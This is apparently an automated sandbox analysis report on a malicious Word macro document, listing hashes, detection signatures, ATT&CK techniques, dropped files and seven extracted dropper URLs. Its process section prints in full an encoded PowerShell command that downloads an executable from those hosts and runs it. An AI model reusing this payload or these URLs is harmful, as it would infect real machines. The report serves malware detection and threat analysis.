ce99d6a97e21495a2133ae942cc02e674461cbcbd4065b65eabdb8bbcfa5743d

General

Target

eddd2a421aa1de337ae7bcec763138bb_JaffaCakes118.doc
Size

196KB
MD5

eddd2a421aa1de337ae7bcec763138bb
SHA1

b4712a21df1c31b4d5924e15167f4ff943de6e5d
SHA256

ce99d6a97e21495a2133ae942cc02e674461cbcbd4065b65eabdb8bbcfa5743d
SHA512

2a62e27052c45991b021aa72c24598a3a296dbd3a4b98c7231a11cf63c5e8828e63ea07785b18db3558b085ab64f7bd6fdaea1152470c18bb82629d5fe2ec4fd
SSDEEP

3072:8YSd22TWTogk079THcpOu5UZWXuSTLGetmsheCZb:Q/TX07hHcJQTSfDmSl

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://amvp-py.com/amvp/r/

exe.dropper

https://dagranitegiare.com/wp-admin/d/

exe.dropper

https://emitt-tech.com/wp-admin/2qG/

exe.dropper

http://kvaser-microsite.tagsom.company/wp-includes/a/

exe.dropper

https://aravindhherbalstore.com/wp-admin/TPA/

exe.dropper

http://leo.jelct.com/wp-content/Hce/

exe.dropper

http://domiciliazione.org/wp/UT8/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3084	1228	powershell.exe	82

Blocklisted process makes network request 7 IoCs

flow	pid	Process
26	3084	powershell.exe
28	3084	powershell.exe
31	3084	powershell.exe
35	3084	powershell.exe
41	3084	powershell.exe
42	3084	powershell.exe
44	3084	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2392	WINWORD.EXE
2392	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3084	powershell.exe
3084	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3084	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2392	WINWORD.EXE
2392	WINWORD.EXE
2392	WINWORD.EXE
2392	WINWORD.EXE
2392	WINWORD.EXE
2392	WINWORD.EXE
2392	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eddd2a421aa1de337ae7bcec763138bb_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABZAG0AaAByADIAdQB0AD0AKAAnAEIAMwAnACsAJwBsACcAKwAoACcAYQAnACsAJwBtAGEAYQAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAcgBwAFIAbwBGAGkAbABlAFwAaAB1ADAAbABzAF8ATABcAHQAVABWAHgAbQBHAEQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIAZQBjAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAYABSAGAASQBUAHkAUAByAE8AYABUAG8AQwBgAE8AbAAiACAAPQAgACgAKAAnAHQAbAAnACsAJwBzACcAKQArACcAMQAnACsAJwAyACwAJwArACgAJwAgAHQAJwArACcAbAAnACkAKwAoACcAcwAxADEAJwArACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABIAG8AcQBfAG0AdgBqACAAPQAgACgAKAAnAE4AMABfADcAJwArACcAMAAnACkAKwAoACcAYwB4ACcAKwAnAGQAbQAnACkAKQA7ACQATQB3ADAANgBwAGUAbAA9ACgAKAAnAEIAYQAnACsAJwBuACcAKQArACgAJwAzACcAKwAnAHoAMgBhACcAKQApADsAJABDAHkAdQBpAGUAdQBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAZABRAEcASAAnACsAJwB1ACcAKQArACgAJwAwACcAKwAnAGwAcwBfACcAKQArACgAJwBsAGQAUQBHACcAKwAnAFQAdAB2ACcAKQArACcAeAAnACsAKAAnAG0AZwBkACcAKwAnAGQAJwApACsAJwBRAEcAJwApAC4AIgBSAGUAYABwAEwAYQBgAEMAZQAiACgAKABbAEMASABhAFIAXQAxADAAMAArAFsAQwBIAGEAUgBdADgAMQArAFsAQwBIAGEAUgBdADcAMQApACwAJwBcACcAKQApACsAJABIAG8AcQBfAG0AdgBqACsAKAAoACcALgAnACsAJwBlAHgAJwApACsAJwBlACcAKQA7ACQARwAyAHkAbABsADIAdAA9ACgAJwBEAG4AJwArACgAJwBnAGkAegA4ACcAKwAnAHoAJwApACkAOwAkAE8AbQByAGsAZgBsADQAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQBUAC4AVwBFAGIAYwBsAEkAZQBOAHQAOwAkAEIAdQBzAHcAcAAzAGEAPQAoACcAaAB0ACcAKwAoACcAdABwACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBhACcAKwAnAG0AdgBwAC0AJwApACsAKAAnAHAAeQAuAGMAbwBtACcAKwAnAC8AJwArACcAYQBtACcAKQArACgAJwB2AHAALwAnACsAJwByACcAKwAnAC8AKgBoAHQAdABwAHMAOgAvACcAKwAnAC8AJwArACcAZABhAGcAcgBhAG4AaQAnACsAJwB0AGUAZwAnACkAKwAoACcAaQAnACsAJwBhAHIAJwApACsAKAAnAGUALgBjACcAKwAnAG8AbQAvAHcAcAAnACsAJwAtACcAKQArACcAYQBkACcAKwAnAG0AJwArACgAJwBpAG4AJwArACcALwBkAC8AKgAnACsAJwBoAHQAdABwACcAKQArACgAJwBzADoALwAvAGUAJwArACcAbQBpACcAKQArACgAJwB0AHQAJwArACcALQAnACkAKwAnAHQAJwArACgAJwBlAGMAJwArACcAaAAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACkAKwAnAC8AMgAnACsAKAAnAHEARwAvACoAJwArACcAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AawAnACkAKwAnAHYAYQAnACsAKAAnAHMAZQAnACsAJwByACcAKQArACgAJwAtAG0AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwByAG8AcwBpAHQAZQAuACcAKQArACcAdAAnACsAJwBhACcAKwAoACcAZwAnACsAJwBzAG8AJwApACsAKAAnAG0AJwArACcALgBjAG8AJwApACsAJwBtACcAKwAoACcAcABhAG4AeQAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgAnACsAJwBjAGwAdQAnACsAJwBkACcAKQArACgAJwBlAHMAJwArACcALwBhACcAKQArACgAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8ALwBhAHIAJwApACsAKAAnAGEAdgAnACsAJwBpAG4AZABoACcAKQArACcAaAAnACsAKAAnAGUAcgAnACsAJwBiACcAKQArACgAJwBhAGwAJwArACcAcwAnACkAKwAnAHQAJwArACgAJwBvAHIAJwArACcAZQAuACcAKwAnAGMAbwBtAC8AdwAnACsAJwBwAC0AYQAnACkAKwAoACcAZABtAGkAbgAnACsAJwAvAFQAUAAnACkAKwAnAEEAJwArACgAJwAvACoAaAB0ACcAKwAnAHQAJwApACsAKAAnAHAAOgAnACsAJwAvAC8AbABlACcAKQArACcAbwAuACcAKwAoACcAagBlAGwAJwArACcAYwB0ACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwArACcAdwBwAC0AJwApACsAKAAnAGMAbwAnACsAJwBuAHQAZQBuACcAKQArACcAdAAvACcAKwAoACcASAAnACsAJwBjAGUAJwArACcALwAqAGgAdAAnACsAJwB0AHAAOgAvAC8AZABvAG0AaQBjAGkAJwArACcAbABpAGEAegAnACkAKwAoACcAaQAnACsAJwBvAG4AJwApACsAJwBlAC4AJwArACcAbwByACcAKwAnAGcALwAnACsAKAAnAHcAcAAvAFUAJwArACcAVAAnACkAKwAnADgAJwArACcALwAnACkALgAiAHMAcABgAEwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARAA2AGMAOQB1AGkAbQA9ACgAKAAnAFIAJwArACcAdQBfAF8AJwApACsAKAAnAHAAJwArACcAMwBrACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASgAzAG8AawBwADkAbgAgAGkAbgAgACQAQgB1AHMAdwBwADMAYQApAHsAdAByAHkAewAkAE8AbQByAGsAZgBsADQALgAiAEQAYABPAFcAbgBsAGAAbwBhAGQAZgBJAGwARQAiACgAJABKADMAbwBrAHAAOQBuACwAIAAkAEMAeQB1AGkAZQB1AHMAKQA7ACQAVgBzADUAOABwAGIAdgA9ACgAJwBDAGcAJwArACcAMQBiACcAKwAoACcAOQBkACcAKwAnAGQAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAQwB5AHUAaQBlAHUAcwApAC4AIgBsAEUAYABOAEcAYABUAEgAIgAgAC0AZwBlACAAMgAyADgANAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AawAnACsAJwBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAEMAeQB1AGkAZQB1AHMAKQA7ACQARwB4ADUAeQBkADgAYQA9ACgAKAAnAE0AJwArACcAdwAzADMAdABuACcAKQArACcAbgAnACkAOwBiAHIAZQBhAGsAOwAkAFkAbwBoAGMANAB6AGQAPQAoACgAJwBJADYAbwAnACsAJwBzACcAKQArACgAJwBsACcAKwAnAGoAdwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgB6AGcAZgBxAHYAMgA9ACgAJwBVACcAKwAoACcAdAAnACsAJwAwACcAKwAnAHAANABfAHUAJwApACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDFEAF.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejviqrfu.yyh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
375a5201cde8a9687d650f04a722e870

SHA1
c27f6c2e2fb0d3524c5b5b00652acbaa4a39f757

SHA256
01f1d1f96de2251291acf34ef1985311ed66751be15a2ae37f5fba709ede74c6

SHA512
d3bb0dc4072b8529b2aaa47864b9b591161da855aa8d332ff941e2203568d850381000b43ace0ddda908e020cae227b22c4da831bb1f1440dbec2061c62363de

Download Submit
C:\Users\Admin\hu0ls_L\tTVxmGD\N0_70cxdm.exe

Filesize
22KB

MD5
cd64eb95d28e6eb19b9a81f035f8fb62

SHA1
5375cc1ff1a81378b67a1c58e92d03b52a63d9c2

SHA256
e2621655bcb55cc59c593994b484b2e022da422dadc352b69aa3565a957b60f5

SHA512
4b7fd5036cbd68f9793b8ab38b0f5892645ac8fcb6c35a9754b08389082498ce74e5cee2cc8b3da6985ff8e33057d988b60d12cb92f562a6f9cd5ca526186a14

Download Submit
memory/2392-7-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-30-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-10-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-9-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-11-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-2-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-6-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-0-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-12-0x00007FF8D64F0000-0x00007FF8D6500000-memory.dmp

Filesize
64KB

Download
memory/2392-13-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-14-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-18-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-19-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-17-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-16-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-15-0x00007FF8D64F0000-0x00007FF8D6500000-memory.dmp

Filesize
64KB

Download
memory/2392-26-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-8-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-252-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-250-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-5-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-87-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-88-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-4-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-251-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-101-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-3-0x00007FF91874D000-0x00007FF91874E000-memory.dmp

Filesize
4KB

Download
memory/2392-110-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/2392-1-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-249-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/2392-248-0x00007FF8D8730000-0x00007FF8D8740000-memory.dmp

Filesize
64KB

Download
memory/3084-100-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download
memory/3084-74-0x00000254F2480000-0x00000254F24A2000-memory.dmp

Filesize
136KB

Download
memory/3084-73-0x00007FF9186B0000-0x00007FF9188A5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads